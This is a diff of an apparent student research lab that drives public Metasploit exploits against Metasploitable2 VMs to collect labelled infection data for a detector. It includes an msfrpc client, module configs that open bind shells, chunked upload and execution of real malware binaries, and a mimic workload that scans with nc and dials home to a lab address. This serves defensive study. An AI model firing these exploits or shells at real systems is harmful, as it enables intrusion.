# The receiver lives behind Caddy on the WG-side collector host. The
# hostname must resolve over WG (collector.wg in the canonical
# spectral lab). The wg-pki CA must be on every lab-host so the
# Caddy-issued internal cert validates.
url = "https://collector.wg"
ca_bundle = "/etc/cis490/certs/wg-ca.pem"
# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
# Comment these out to fall back to bearer-token auth during early
# bring-up.
client_cert = "/etc/cis490/certs/lab-host.pem"
client_key = "/etc/cis490/certs/lab-host.key"
# Bearer is optional and only used if mTLS isn't yet configured. When
# both are set, mTLS does the actual authn and the bearer is a
# belt-and-suspenders check.
# bearer_token = "REPLACE_ME_WITH_SECRET"
# Set to false ONLY for local-loopback dev against an unsigned cert.
# verify_tls = true
[shipper]
scan_interval_s = 5.0
request_timeout_s = 60.0
[episode]
baseline_seconds = 30
infected_seconds = 90
dormant_seconds = 60
[retention]
keep_local_for_days = 7
prune_at_disk_pct = 80

View file

@ -1,6 +1,6 @@
# CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.
listen_addr = "127.0.0.1:8443"
listen_addr = "127.0.0.1:8444"
store_root = "/var/lib/cis490/episodes"
incoming_root = "/var/lib/cis490/incoming"
index_path = "/var/lib/cis490/index.jsonl"

View file

@ -1,12 +1,92 @@
# exploits/
Metasploit resource scripts (`*.rc`) that drive specific exploit modules
deterministically — same inputs, same module options, every time.
The Tier-3 exploit driver — fires a Metasploit module against a
vulnerable target VM, watches for the resulting session, and stamps the
session-open transition into the episode's `events.jsonl` so the
labeler can mark `armed → infecting` honestly.
Each script:
- Sets `RHOSTS` to the guest's bridge IP.
- Sets a payload that opens a session usable for sample upload + execute.
- Avoids any options that introduce randomness in the exploit fire timing
(so that the `armed → infecting` transition lands at a predictable offset).
## Layout
These scripts pair with public Metasploit modules. We do not author exploits.
```
exploits/
msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd
driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase
modules.py ModuleConfig + TOML loader
modules/
vsftpd_234_backdoor.toml first canned module (Metasploitable2)
...
```
## Module configs
Each `modules/*.toml` describes one Metasploit module — its path, the
options to set, and the payload to use. The driver reads these files
to drive `module.execute` over msfrpc.
```toml
description = "..."
[module]
type = "exploit" # exploit | auxiliary | post
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime
RPORT = 21
[payload]
path = "cmd/unix/interact"
[payload.options] # optional
# LHOST = "{{ target_ip }}"
[session]
type = "shell"
```
The only placeholder supported today is `{{ target_ip }}`. Add more in
`exploits/modules.py::ModuleConfig.render_options` when needed.
## Running
```sh
# 1. Start msfrpcd locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
# Metasploitable2 — see docs/sources.md for sha256).
# 3. Drive an episode:
MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
--module vsftpd_234_backdoor \
--target-port 21 \
--data-root data
```
The episode's `events.jsonl` will contain:
```
driver_setup — module + target snapshotted before fire
exploit_fire — module.execute issued
session_open — new session id observed in session.list
session_landing_probe — first command response (id) recorded
sample_executed — workload kicked off inside the session
session_dormant — workload killed
session_killed — session.stop at episode end
```
These pair with the standard phase labels in `labels.jsonl` so a
downstream loader can reconcile "what the orchestrator scheduled"
against "what actually happened on the wire".
## Adding a module
1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
2. Pick a payload that works without a callback channel until the
`br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
`restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
and other "session on the same socket" payloads are safe.
3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
4. The new module is automatically picked up by `tools/run_tier3_demo.py`
via `--module <name>`; no driver code changes needed.
We do **not** author exploits or modify upstream Metasploit code. The
driver is a pure adapter from the project's phase machine to msfrpc.

0
exploits/__init__.py Normal file
View file

338
exploits/driver.py Normal file
View file

@ -0,0 +1,338 @@
"""Tier-3 exploit driver.
Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
the closed phase enum into msfrpc actions:
clean idle. (no-op; exploit hasn't fired yet)
armed module loaded + options applied; module fires
with ``module.execute``. Driver records the fire
timestamp via ``emit_event`` so the labeler can
align ``armed`` with what's actually happening.
infecting poll for a new session; on session_open, run a
one-shot landing command (``id`` or similar) so
we have a clear "session is responsive" event.
infected_running start observable workload inside the session.
dormant kill the workload, leave the session alive.
reverting kill session, snapshot revert handled by caller.
The events the driver writes match the schema in ``docs/data-model.md``:
``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
``session_killed``.
The driver does NOT author exploits or pick payloads at runtime those
choices live in ``exploits/modules/*.toml``. The driver is a pure
adapter between the phase machine and msfrpc.
"""
from __future__ import annotations
import logging
import time
from dataclasses import dataclass
from typing import Callable
from pathlib import Path
from samples.manifest import Sample
from .modules import ModuleConfig
from .msfrpc import MSFRpcClient, wait_for_new_session
from .workloads import (
ChunkedUpload, Workload, chunked_real_binary_upload,
real_binary_workload, workload_for,
)
log = logging.getLogger("cis490.exploits.driver")
EmitEvent = Callable[..., None]
@dataclass
class DriverConfig:
target_ip: str
session_open_timeout_s: float = 30.0
# Driver v1 fallback workload — used only when no Sample is passed
# in (Sample-driven runs override these via exploits.workloads).
# We keep the v1 path so existing callers keep working unchanged.
workload_cmd: str = "yes > /dev/null"
workload_kill_cmd: str = "pkill yes; true"
# Where staged real-malware binaries live on the lab host.
sample_store_root: Path | None = None
class MSFExploitDriver:
"""Phase-to-msfrpc adapter. One instance per episode.
When constructed with a ``Sample``, the driver dispatches the
``infected_running`` / ``dormant`` workload through
``exploits.workloads`` so the in-session behaviour matches the
sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
low-and-slow, shell-resident). Without a sample, falls back to
the v1 single-command workload useful for the very first
Tier-3 smoke runs."""
def __init__(
self,
client: MSFRpcClient,
module: ModuleConfig,
cfg: DriverConfig,
emit_event: EmitEvent,
*,
sample: Sample | None = None,
) -> None:
self.client = client
self.module = module
self.cfg = cfg
self.emit = emit_event
self.sample = sample
# Chunked upload plan (None unless real binary path applies).
self._chunked: ChunkedUpload | None = None
self.workload: Workload | None = self._resolve_workload(sample)
self._sessions_seen_at_arm: set[int] = set()
self._session_id: int | None = None
self._job_id: int | str | None = None
self._fired = False
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
"""Pick the best workload for this sample:
1. real binary (if staged at samples/store/<sha256>) chunked
upload + exec via dedicated dispatch path
2. profile mimic from exploits.workloads
3. None driver v1 fallback (yes-loop)
"""
if sample is None:
return None
if sample.kind == "real" and self.cfg.sample_store_root is not None:
bin_path = sample.binary_path(self.cfg.sample_store_root)
if bin_path is not None:
try:
payload = bin_path.read_bytes()
self._chunked = chunked_real_binary_upload(payload, sample=sample)
# Return a Workload shell so the rest of the driver
# can treat the dispatch uniformly. start_cmd is
# never sent verbatim — _start_workload walks the
# chunked plan instead.
return Workload(
profile=self._chunked.profile,
start_cmd="(chunked-upload-managed-by-driver)",
stop_cmd=self._chunked.stop_cmd,
description=f"Real binary chunked upload+execute "
f"({len(payload)} bytes, "
f"{self._chunked.n_chunks} chunks)",
)
except OSError as e:
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
return workload_for(sample)
# ---- lifecycle ------------------------------------------------------
def setup(self) -> None:
"""Authenticate and snapshot the pre-existing session set so we
can recognize a *new* session as the one we just opened."""
self.client.login()
self._sessions_seen_at_arm = set(self.client.session_list().keys())
self.emit(
"driver_setup",
module=self.module.module_path,
payload=self.module.payload_path,
target_ip=self.cfg.target_ip,
preexisting_sessions=sorted(self._sessions_seen_at_arm),
sample=self.sample.name if self.sample else None,
sample_kind=self.sample.kind if self.sample else None,
sample_sha256=self.sample.sha256 if self.sample else None,
workload_profile=self.workload.profile if self.workload else None,
)
def teardown(self) -> None:
if self._session_id is not None:
try:
self.client.session_stop(self._session_id)
self.emit("session_killed", session_id=self._session_id)
except Exception:
log.exception("session.stop on %s", self._session_id)
if self._job_id is not None:
try:
self.client.job_stop(self._job_id)
except Exception:
log.debug("job.stop on %s (often already gone)", self._job_id)
self.client.logout()
# ---- phase callback -------------------------------------------------
def set_phase(self, phase: str) -> None:
log.info("driver phase -> %s", phase)
if phase == "clean":
return
if phase == "armed":
self._fire()
elif phase == "infecting":
self._await_session()
elif phase == "infected_running":
self._start_workload()
elif phase == "dormant":
self._stop_workload()
elif phase == "reverting":
self.teardown()
else:
log.warning("unknown phase: %s", phase)
# ---- actions --------------------------------------------------------
def _fire(self) -> None:
if self._fired:
log.debug("module already fired; skipping re-fire")
return
opts = self.module.render_options(target_ip=self.cfg.target_ip)
self.emit(
"exploit_fire",
module=self.module.module_path,
options={k: v for k, v in opts.items() if k != "PASSWORD"},
)
resp = self.client.module_execute(
self.module.module_type, self.module.module_path, opts,
)
self._job_id = resp.get("job_id")
self._fired = True
def _await_session(self) -> None:
if self._session_id is not None:
return
result = wait_for_new_session(
self.client,
seen=self._sessions_seen_at_arm,
timeout_s=self.cfg.session_open_timeout_s,
)
if result is None:
self.emit(
"session_open_timeout",
module=self.module.module_path,
timeout_s=self.cfg.session_open_timeout_s,
)
log.warning(
"no session opened within %.1fs", self.cfg.session_open_timeout_s,
)
return
sid, info = result
self._session_id = sid
self.emit(
"session_open",
session_id=sid,
session_type=info.get("type"),
tunnel_peer=info.get("tunnel_peer"),
)
# Landing probe so we have a known-good RTT marker on the wire.
try:
self.client.session_shell_write(sid, "id")
time.sleep(0.5)
out = self.client.session_shell_read(sid)
self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
except Exception:
log.exception("landing probe on session %s", sid)
def _start_workload(self) -> None:
if self._session_id is None:
log.warning("infected_running with no session — skipping workload")
return
if self._chunked is not None:
self._upload_real_binary_chunked()
return
if self.workload is not None:
# Driver v2 — profile-matched mimic workload.
self.client.session_shell_write(self._session_id, self.workload.start_cmd)
self.emit(
"sample_executed",
session_id=self._session_id,
profile=self.workload.profile,
description=self.workload.description,
sample=self.sample.name if self.sample else None,
)
else:
# Driver v1 fallback.
self.client.session_shell_write(
self._session_id,
f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
f">/dev/null 2>&1 & disown",
)
self.emit(
"sample_executed",
session_id=self._session_id,
command=self.cfg.workload_cmd,
)
def _upload_real_binary_chunked(self) -> None:
"""Walk the ChunkedUpload plan: each chunk is a separate
shell_write so msfrpc never sees a buffer-busting payload.
Verifies the in-guest sha256 before exec; emits per-step
events so we have a wire-level audit trail of Tier-4 runs."""
plan = self._chunked
assert plan is not None and self._session_id is not None
sid = self._session_id
self.emit(
"real_binary_upload_begin",
session_id=sid,
n_chunks=plan.n_chunks,
sha256=plan.expected_sha256,
sample=self.sample.name if self.sample else None,
)
for i, chunk in enumerate(plan.chunks):
self.client.session_shell_write(sid, chunk)
# Read back so the next write doesn't race ahead of the
# previous one's prompt return. We don't parse it.
try:
self.client.session_shell_read(sid)
except Exception:
pass
# Decode + verify on the guest side.
self.client.session_shell_write(sid, plan.finalize_cmd)
try:
verify_out = self.client.session_shell_read(sid)
except Exception:
verify_out = ""
verified = "sha-ok" in verify_out
self.emit(
"real_binary_verify",
session_id=sid,
ok=verified,
output=verify_out.strip()[:256],
sha256=plan.expected_sha256,
)
if not verified:
self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
return
# Launch.
self.client.session_shell_write(sid, plan.exec_cmd)
self.emit(
"sample_executed",
session_id=sid,
profile=plan.profile,
sample=self.sample.name if self.sample else None,
sha256=plan.expected_sha256,
kind="real",
)
def _stop_workload(self) -> None:
if self._session_id is None:
return
if self.workload is not None:
self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
else:
self.client.session_shell_write(
self._session_id, self.cfg.workload_kill_cmd,
)
self.emit(
"session_dormant",
session_id=self._session_id,
profile=self.workload.profile if self.workload else None,
)
def _shquote(s: str) -> str:
# Minimal POSIX single-quote escaping. The workload command is set
# by us, not by anything user-controlled, so we just need to handle
# embedded single quotes correctly for completeness.
return "'" + s.replace("'", "'\\''") + "'"

147
exploits/modules.py Normal file
View file

@ -0,0 +1,147 @@
"""TOML loader for exploit-module configs.
Each ``exploits/modules/*.toml`` describes one Metasploit module its
path, the options to set, the payload to use, and how the driver
should treat the resulting session. The driver consumes ``ModuleConfig``
objects; the TOML files are the on-disk source of truth.
Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
imperative and assume an interactive console; the driver needs the
*structured* options to push them through msfrpc. TOML is the simplest
way to express a small typed map of options and it round-trips
cleanly into ``meta.json`` for episode reproducibility.
Per-(host, slot, episode) selection mirrors the sample-manifest
selector: we want different vulnerabilities exercised across hosts
and waves so the trained model sees a diverse corpus of
``armed infecting`` transition shapes, not just the same FTP
backdoor every run.
"""
from __future__ import annotations
import hashlib
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any
_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
@dataclass(frozen=True)
class ModuleConfig:
name: str # short id, e.g. "vsftpd_234_backdoor"
module_type: str # "exploit" | "auxiliary" | "post"
module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor"
options: dict[str, Any] = field(default_factory=dict)
payload_path: str | None = None # e.g. "cmd/unix/interact"
payload_options: dict[str, Any] = field(default_factory=dict)
expected_session_type: str = "shell" # what we'll get on success
description: str = ""
# When true the module's payload uses a callback channel (reverse
# or bind shell) and won't land a session under SLIRP+restrict=on.
# The fleet runner skips these unless BRIDGE is set so episodes
# that fire them actually produce data.
requires_bridge: bool = False
def render_options(self, *, target_ip: str) -> dict[str, Any]:
"""Substitute ``{{ target_ip }}`` placeholders in options.
Module configs use Jinja-style placeholders for any value that
isn't known until episode time (RHOSTS, LHOST, etc.). Today the
only supported placeholder is ``target_ip``; if more are needed
later, generalize here."""
out: dict[str, Any] = {}
for k, v in self.options.items():
if isinstance(v, str) and "{{" in v:
out[k] = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
else:
out[k] = v
# MSF requires PAYLOAD as a top-level option even though we
# carry it in a separate field on the config.
if self.payload_path:
out["PAYLOAD"] = self.payload_path
for k, v in self.payload_options.items():
if isinstance(v, str) and "{{" in v:
v = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
out[k] = v
return out
def load_module_config(path: Path) -> ModuleConfig:
raw = tomllib.loads(path.read_text())
mod = raw.get("module") or {}
module_path = mod.get("path")
module_type = mod.get("type", "exploit")
if not isinstance(module_path, str) or not module_path:
raise ValueError(f"{path}: module.path must be a non-empty string")
if module_type not in _VALID_MODULE_TYPES:
raise ValueError(
f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
)
options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
payload = raw.get("payload") or {}
return ModuleConfig(
name=path.stem,
module_type=module_type,
module_path=module_path,
options=dict(options),
payload_path=payload.get("path"),
payload_options=dict(payload.get("options") or {}),
expected_session_type=raw.get("session", {}).get("type", "shell"),
description=raw.get("description", ""),
requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
)
def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
"""Load every ``*.toml`` under ``directory``, keyed by short name."""
return {
p.stem: load_module_config(p)
for p in sorted(directory.glob("*.toml"))
}
def select_module(
catalog: dict[str, ModuleConfig],
*,
host_id: str,
slot: int,
episode_index: int,
) -> ModuleConfig:
"""Deterministic per-(host, slot, ep) module selector. Mirrors
SampleManifest.select() so the entry vector rotates the same way
the post-infection workload does. Two hosts hash to different
modules at the same slot/episode (collision rate ~1/N); a single
host walks the full catalog within ~len(catalog) episodes.
Inputs reduce to a SHA-256 keyed lookup so runs replay
bit-identically given the same (host, slot, ep) tuple."""
if not catalog:
raise ValueError("module catalog is empty")
keys = sorted(catalog.keys())
seed = f"module|{host_id}|{slot}|{episode_index}".encode()
h = hashlib.sha256(seed).digest()
idx = int.from_bytes(h[:8], "big") % len(keys)
return catalog[keys[idx]]
def module_target_port(module: ModuleConfig) -> int | None:
"""Pull the RPORT off a module config. Used by the fleet runner
to wire the launcher's hostfwd to the right service inside the
target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
unrealircd:6667)."""
rport = module.options.get("RPORT")
if isinstance(rport, int):
return rport
if isinstance(rport, str) and rport.isdigit():
return int(rport)
return None

View file

@ -0,0 +1,36 @@
description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The
distcc daemon doesn't verify the source of compile jobs, so a
crafted DCC_CMD-style request runs an arbitrary command as the
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
3632. Returns a low-priv shell paired with a privesc later if
needed; for envelope work the unprivileged shell is enough.
"""
[module]
type = "exploit"
path = "unix/misc/distcc_exec"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 3632
[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4444
[session]
type = "shell"
[runtime]
# Reverse/bind callback path → needs the host-only bridge so the
# guest can reach the attacker (or the host can reach the bind port
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
# lab host to enable.
requires_bridge = true
extra_target_ports = [4444]

View file

@ -0,0 +1,28 @@
description = """
PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
treats query-string args as command-line flags, letting a crafted
?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
shell session on whoever runs Apache.
"""
[module]
type = "exploit"
path = "multi/http/php_cgi_arg_injection"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 80
TARGETURI = "/"
[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4445
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4445]

View file

@ -0,0 +1,21 @@
description = """
Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
is a crafted username at SMB authentication; the Samba daemon shells
out via the username_map_script and runs whatever the attacker put in
the username. Standard Metasploitable2 vector. Returns a root shell
on the SMB socket works with cmd/unix/interact.
"""
[module]
type = "exploit"
path = "multi/samba/usermap_script"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 139
[payload]
path = "cmd/unix/interact"
[session]
type = "shell"

View file

@ -0,0 +1,28 @@
description = """
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
shipped to the official mirrors carried a backdoor that runs an
arbitrary command on receipt of a magic AB; payload string. Once
the backdoor was discovered the official tarball was pulled, but
Metasploitable2 still ships the trojaned build. Returns a shell on
the IRC user.
"""
[module]
type = "exploit"
path = "unix/irc/unreal_ircd_3281_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 6667
[payload]
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4446
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4446]

View file

@ -0,0 +1,23 @@
description = """
vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
USER name ending with ':)'. Standard Metasploitable2 exploit, fully
deterministic perfect for a Tier-3 first-light run because the
exploit fire timing is bounded by a single FTP round-trip.
"""
[module]
type = "exploit"
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 21
# The exploit returns its own command shell — we drive it with a
# minimal cmd/unix/interact payload so the session lands as a plain
# shell session usable by session.shell_write/read.
[payload]
path = "cmd/unix/interact"
[session]
type = "shell"

231
exploits/msfrpc.py Normal file
View file

@ -0,0 +1,231 @@
"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
huge; this client implements only the verbs we actually call:
auth.login get a token
auth.logout release the token
module.execute fire an exploit (or aux) module by name
job.list / job.stop manage the running module
session.list see opened sessions, find the one we just opened
session.shell_write/read run commands in a shell session
session.stop kill a session at episode end
Why not pull in pymetasploit3? Two reasons:
- msfrpcd's protocol is small enough that owning it removes a third-party
dep (and a maintenance risk on a course project).
- the parts we need (session opening, shell commands, job lifecycle)
are simple, and we want full visibility into what's on the wire when
debugging an exploit fire.
The client is intentionally synchronous; the Tier-3 driver runs in the
orchestrator's main thread alongside the collector, and a session-open
poll of a few hundred milliseconds is well within budget.
"""
from __future__ import annotations
import http.client
import logging
import socket
import ssl
import time
from dataclasses import dataclass
from typing import Any
try:
import msgpack # type: ignore[import-untyped]
except ImportError as e: # pragma: no cover - import-time guard
raise ImportError(
"the msgpack package is required for the MSF RPC client. "
"install it with: pip install msgpack"
) from e
log = logging.getLogger("cis490.msfrpc")
class MSFRpcError(RuntimeError):
"""Raised when msfrpcd returns an error or a malformed response."""
@dataclass
class MSFRpcConfig:
host: str = "127.0.0.1"
port: int = 55553
user: str = "msf"
password: str = ""
ssl: bool = True
timeout_s: float = 30.0
# msfrpcd's default cert is self-signed — most callers will run
# against localhost where this is the right tradeoff. Override
# explicitly for any non-loopback host.
verify: bool = False
class MSFRpcClient:
"""Synchronous msfrpcd client. Token is acquired on ``login()`` and
re-used on every subsequent call. Not thread-safe; the driver owns
one client per episode."""
def __init__(self, cfg: MSFRpcConfig) -> None:
self.cfg = cfg
self._token: str | None = None
# ---- session management --------------------------------------------
def login(self) -> None:
resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
if resp.get("result") != "success" or "token" not in resp:
raise MSFRpcError(f"auth.login failed: {resp!r}")
self._token = resp["token"]
log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
def logout(self) -> None:
if self._token is None:
return
try:
self._call("auth.logout", self._token)
except MSFRpcError as e:
log.warning("msfrpc auth.logout: %s", e)
finally:
self._token = None
# ---- modules --------------------------------------------------------
def module_execute(
self,
module_type: str,
module_name: str,
options: dict[str, Any],
) -> dict[str, Any]:
"""Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
resp = self._call("module.execute", module_type, module_name, options)
if "job_id" not in resp:
raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
log.info(
"module.execute %s/%s -> job_id=%s uuid=%s",
module_type, module_name, resp["job_id"], resp.get("uuid"),
)
return resp
# ---- jobs -----------------------------------------------------------
def job_list(self) -> dict[str, str]:
return self._call("job.list")
def job_stop(self, job_id: int | str) -> dict[str, Any]:
# msfrpcd accepts the id as a string.
return self._call("job.stop", str(job_id))
# ---- sessions -------------------------------------------------------
def session_list(self) -> dict[int, dict[str, Any]]:
raw = self._call("session.list")
# msfrpcd keys session ids as ints in msgpack but some versions
# round-trip them as strings. Normalize.
out: dict[int, dict[str, Any]] = {}
for k, v in (raw or {}).items():
try:
out[int(k)] = v
except (TypeError, ValueError):
pass
return out
def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
if not data.endswith("\n"):
data = data + "\n"
return self._call("session.shell_write", session_id, data)
def session_shell_read(self, session_id: int) -> str:
resp = self._call("session.shell_read", session_id)
return resp.get("data", "") if isinstance(resp, dict) else ""
def session_stop(self, session_id: int) -> dict[str, Any]:
return self._call("session.stop", session_id)
# ---- transport ------------------------------------------------------
def _call(self, method: str, *args: Any) -> dict[str, Any]:
if self._token is None:
raise MSFRpcError("not authenticated; call login() first")
return self._raw_call([method, self._token, *args])
def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
return self._raw_call([method, *args])
def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
body = msgpack.packb(payload, use_bin_type=False)
conn = self._open_conn()
try:
conn.request(
"POST",
"/api/",
body=body,
headers={
"Content-Type": "binary/message-pack",
"Content-Length": str(len(body)),
"Connection": "close",
},
)
r = conn.getresponse()
raw = r.read()
if r.status != 200:
raise MSFRpcError(
f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
)
except (socket.error, http.client.HTTPException) as e:
raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
finally:
conn.close()
try:
decoded = msgpack.unpackb(raw, raw=False)
except Exception as e:
raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
if isinstance(decoded, dict) and decoded.get("error") is True:
raise MSFRpcError(
f"{payload[0]!r}: {decoded.get('error_class')} "
f"{decoded.get('error_message')}"
)
if not isinstance(decoded, dict):
# session.list and friends can legitimately return {} or a dict,
# but never a non-dict — anything else is a protocol violation.
raise MSFRpcError(
f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
)
return decoded
def _open_conn(self) -> http.client.HTTPConnection:
if self.cfg.ssl:
ctx = ssl.create_default_context()
if not self.cfg.verify:
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return http.client.HTTPSConnection(
self.cfg.host, self.cfg.port,
timeout=self.cfg.timeout_s, context=ctx,
)
return http.client.HTTPConnection(
self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
)
def wait_for_new_session(
client: MSFRpcClient,
*,
seen: set[int],
timeout_s: float,
poll_s: float = 0.25,
) -> tuple[int, dict[str, Any]] | None:
"""Poll ``session.list`` until a session id we haven't seen before
appears, or until timeout. Returns ``(session_id, info)`` or None."""
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
sessions = client.session_list()
for sid, info in sessions.items():
if sid not in seen:
return sid, info
time.sleep(poll_s)
return None

346
exploits/workloads.py Normal file
View file

@ -0,0 +1,346 @@
"""Per-sample-profile post-exploit workloads (driver v2).
The Tier-3 driver lands a session and then needs to drive *something*
in that session for the ``infected_running`` phase. Driver v1 ran
``yes > /dev/null`` for every sample, which is fine for proving the
pipe but is the wrong shape for ML every Tier-3 episode produces
the same envelope regardless of which malware family we said it was.
Driver v2 maps ``sample.profile`` from the manifest to a distinct
in-session workload so each profile's envelope is observably
different on every collector:
cpu-saturate 1-vCPU saturation, very low IO/net (XMRig shape)
scan-and-dial SYN scans across the bridge IP space + periodic
dial-home (Mirai shape)
io-walk fs traversal + random write spikes (ransomware shape)
bursty-c2 long idle, periodic short TCP egress bursts (Dridex)
low-and-slow minimal CPU, periodic memory churn (Kovter)
shell-resident one long-lived TCP socket pinned to a bridge IP,
occasional small command bursts (RAT)
Each profile returns a small shell command that backgrounds a loop
inside the session. The driver can stop them by killing the loop's
PID file or via a profile-specific kill command.
This module is intentionally *behaviorally diverse but harmless*
it does NOT execute real malware. Real binaries land via the Tier-4
fetch+run path (separate work). What this gives us today is six
distinguishable in-guest envelopes the ML model can learn to
discriminate between *and* fall back to when a real sample isn't yet
staged.
"""
from __future__ import annotations
import logging
from dataclasses import dataclass
from samples.manifest import Sample
log = logging.getLogger("cis490.exploits.workloads")
@dataclass(frozen=True)
class Workload:
"""A pair of shell commands executable in a Metasploit shell session.
``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
``stop_cmd`` kills the loop using that PID file. Both commands are
expected to be POSIX-shell compatible and to leave the session in
a usable state on completion (return code 0 on the prompt)."""
profile: str
start_cmd: str
stop_cmd: str
description: str
@property
def pid_path(self) -> str:
return f"/tmp/.cis490-workload-{self.profile}.pid"
def _wrap_loop(name: str, body: str) -> Workload:
"""Common pattern: write a small wrapper script that loops ``body``,
background it, and stash the wrapper's PID. Stop kills that PID +
its child group."""
pid_path = f"/tmp/.cis490-workload-{name}.pid"
script_path = f"/tmp/.cis490-workload-{name}.sh"
# Triple-quote the body into a heredoc so single-quotes inside the
# body don't conflict with our outer single-quoting.
start = (
f"cat > {script_path} <<'CIS490_EOF'\n"
f"#!/bin/sh\n"
f"trap 'exit 0' TERM INT\n"
f"while :; do\n"
f"{body}\n"
f"done\n"
f"CIS490_EOF\n"
f"chmod +x {script_path}; "
f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
f"echo $! > {pid_path}\n"
f"disown\n"
)
stop = (
f"if [ -f {pid_path} ]; then "
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
f" kill $(cat {pid_path}) 2>/dev/null; "
f" rm -f {pid_path} {script_path}; "
f"fi; true\n"
)
return Workload(profile=name, start_cmd=start, stop_cmd=stop,
description="(generated)")
# ---------------------------------------------------------------------------
# Profile factories — each returns a Workload tuned to that family
# ---------------------------------------------------------------------------
def _cpu_saturate() -> Workload:
"""XMRig-class — sustained single-vCPU saturation, no IO, no net."""
body = " yes > /dev/null 2>&1 &\n wait $!\n"
w = _wrap_loop("cpu-saturate", body)
return Workload(
profile="cpu-saturate",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="100% CPU on 1 vCPU; no IO, no net",
)
def _scan_and_dial() -> Workload:
"""Mirai-class — TCP SYN-style probe of bridge subnet + occasional
"dial home" to the gateway. Heavy net, moderate CPU.
Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
latter is bash-only and silently no-ops on busybox / dash, which
is what Metasploitable2 and Alpine guest sessions actually run.
Falls back to a TCP-via-python one-liner if nc isn't available."""
body = (
" for i in 1 2 3 4 5 6 7 8 9 10; do\n"
" nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
" nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
" done\n"
" wait\n"
" echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
" sleep 2\n"
)
w = _wrap_loop("scan-and-dial", body)
return Workload(
profile="scan-and-dial",
start_cmd=w.start_cmd,
stop_cmd=w.stop_cmd,
description="Periodic SYN-style scan across bridge IPs + dial-home",
)
def _io_walk() -> Workload:
"""Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
body = (
" mkdir -p /tmp/.cis490-victim\n"
